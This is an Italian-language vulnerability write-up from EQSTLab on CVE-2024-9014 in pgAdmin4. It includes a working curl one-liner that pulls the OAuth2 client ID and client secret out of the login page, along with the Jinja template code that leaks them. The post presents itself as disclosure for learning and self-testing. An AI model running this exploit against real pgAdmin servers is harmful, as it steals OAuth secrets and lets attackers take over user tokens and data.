
Esposizione di Informazioni Sensibili di Pgadmin4
Questo post è un articolo di ricerca pubblicato da EQSTLab.
★ CVE-2024-9014 PoC di Esposizione di Informazioni Sensibili ★
CVE-2024-9014 : Esposizione di Informazioni Sensibili in pgAdmin4
descrizione: le versioni di pgAdmin 8.11 e precedenti sono vulnerabili a un difetto di sicurezza nell'autenticazione OAuth2. Questa vulnerabilità consente a un attaccante di ottenere potenzialmente il client ID e il client secret, portando ad accesso non autorizzato ai dati dell'utente.
curl [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'
curl http://localhost:8000/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'
pgadmin4-8.9 e pgadmin4-8.12

A questo punto, la variabile config.OAUTH2_CONFIG restituisce i file di configurazione OAUTH2 includendo OAUTH2_CLIENT_ID e OAUTH2_CLIENT_SECRET.
{% set page_name = 'login_user' %}
{% set user_language = request.cookies.get('PGADMIN_LANGUAGE') or 'en' %}
{% set ns = namespace(langOptions=[]) %}
{% for key, lang in config.LANGUAGES.items() %}
{% set _ = ns.langOptions.append({'value': key, 'label': lang}) %}
{% endfor %}
{% set page_props = {
'userLanguage': user_language,
'langOptions': ns.langOptions,
'forgotPassUrl': url_for('browser.forgot_password'),
'loginUrl': url_for('authenticate.login'),
'csrfToken': csrf_token(),
'authSources': config.AUTHENTICATION_SOURCES,
'authSourcesEnum': {
'OAUTH2': config.OAUTH2,
'KERBEROS': config.KERBEROS,
},
'oauth2Config': config.OAUTH2_CONFIG,
'loginBanner': config.LOGIN_BANNER|safe
} %}
{% extends "security/render_page.html" %}

Identificare e proteggere i parametri OAuth segreti è molto importante. Mentre “client_id” può essere divulgato in sicurezza, divulgare “client_secret” comporta un rischio significativo. Se il client_secret viene compromesso, un attaccante può sfruttare l'identità e la fiducia dell'applicazione per rubare il “access token” dell'utente e le informazioni personali.
Questo repository non è inteso per esporre informazioni sensibili relative a CVE-2024-9014. Lo scopo di questo progetto è aiutare le persone a conoscere questa vulnerabilità e, forse, testare le proprie applicazioni.
Pubblichiamo analisi di CVE e malware una volta al mese. Se sei interessato, segui i link qui sotto per consultare le nostre pubblicazioni. https://www.skshieldus.com/eng/business/insight.do